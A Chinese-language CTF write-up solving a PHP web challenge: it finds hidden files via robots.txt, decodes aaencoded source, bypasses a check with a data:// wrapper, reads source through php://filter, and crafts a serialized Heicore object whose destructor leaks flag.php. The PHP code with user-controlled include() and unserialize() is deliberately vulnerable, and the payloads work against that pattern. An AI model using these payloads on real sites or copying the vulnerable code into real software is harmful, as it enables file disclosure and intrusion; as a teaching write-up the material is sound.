题目地址:http://ctf.merak.codes
打开是个没用的网站,扫描一下~ 访问/robots.txt,发现三个文件:
User-agent: * Disallow: /relax.php Disallow: /heicore.php Disallow: /flag.php其中只有/relax.php里有东西,查看源码: 这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode 整理得:
$_ = $_GET['pw']; $__ = $_GET['file']; $___ = $_GET['(><)']; if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) { echo '<img src="./images/13.jpg" alt=""><br>'; include($__); } else { echo '<img src="./images/1.gif" alt="">'; }其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过; 下面还有个include($__);,想用file=flag.php用include来包含flag,却回显“It’s not that simple”,是我太天真了! 于是构造php://filter伪协议来读取heicore.php和relax.php的源码 heicore.php:
<?php class Heicore{ public $file; public function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } }relax.php:
<?php error_reporting(E_ALL^E_NOTICE^E_WARNING); $_ = $_GET['pw']; $__ = $_GET['file']; $___ = $_GET['(><)']; if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three")) { echo '<img src="./images/13.jpg" alt=""><br>'; if(preg_match("/flag/i",$__)) { echo "It's not that simple"; exit(); }else{ include($__); unserialize($___); } }else echo '<img src="./images/1.gif" alt="">'; } ?>终于拿到了完整的源码,的确是过滤了flag 可以看到heicore.php中的析构函数会输出$file,所以把它包含进来,并让其成员$file等于flag.php,由于调用了函数unserialize(),我们就利用反序列化触发魔术方法__destruct()来输出flag;
<?php class Heicore { public $file = 'php://filter/read=convert.base64-encode/resource=flag.php'; } $a = new Heicore(); $b = serialize($a); echo $b; #O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}构造的payload:
?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}解base64
